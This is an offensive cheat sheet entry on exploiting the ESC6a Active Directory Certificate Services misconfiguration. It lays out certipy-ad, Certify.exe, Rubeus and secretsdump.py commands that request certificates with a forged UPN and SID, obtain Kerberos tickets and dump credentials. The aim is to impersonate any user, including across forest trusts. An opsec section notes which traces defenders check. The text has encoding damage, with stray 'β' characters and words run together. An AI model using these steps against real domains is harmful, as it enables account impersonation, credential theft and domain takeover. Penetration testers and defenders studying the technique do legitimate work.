ADCSESC6a
ESC6a: EDITF_ATTRIBUTESUBJECTALTNAME2 flag enabled on CA + SID in SAN required β enroll in any Client Auth template and specify an arbitrary SAN with the target's SID to impersonate any user, including across forest trusts.
Applies to: Users/Computers with Enroll rights on any Client Auth template β Enterprise CA with EDITF_ATTRIBUTESUBJECTALTNAME2 set (strong cert mapping enforced; SID URL required)
Linux Abuse
certipy-ad
# Step 1: Confirm CA flag and find usable templates
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Step 2: Request cert with target UPN + SID URL
# Note: Certipy may not support -sid-url natively on all versions;
# use Certify on Windows for SID-URL inclusion, or use ESC6b (no strong mapping) path
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
-ca '<ca>' -target <ca-host> -template '<template>' \
-upn <target-user>@<domain>
# Step 3: Authenticate
certipy-ad auth -pfx <target-user>.pfx -dc-ip <dc-ip>
# Step 4: PTH
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<target-user>@<dc-ip>'
Windows Abuse
Certify.exe + Rubeus (supports SID URL)
# Step 1: Find vulnerable CA
Certify.exe find /vulnerable
# Step 2: Request cert with UPN + SID (required for strong cert mapping)
Certify.exe request /ca:<ca-host>\<ca> /template:<template> \
/upn:<target-user>@<domain> \
/sid:S-1-5-21-<domain-sid>-<target-rid>
# Step 3: TGT
Rubeus.exe asktgt /user:<target-user> /domain:<domain> \
/certificate:<pfx-base64> /ptt
# Verify
klist
Opsec
- CA flag
EDITF_ATTRIBUTESUBJECTALTNAME2is visible viacertutil -getreg policy\EditFlagsβ defenders actively check this. - All issued certs are logged in the CA's Issued Certificates store with the requesting principal identity visible.
- ESC6a differs from ESC6b in that strong cert mapping (KB5014754) is enforced β the SID must be embedded in the SAN for the cert to authenticate on patched DCs.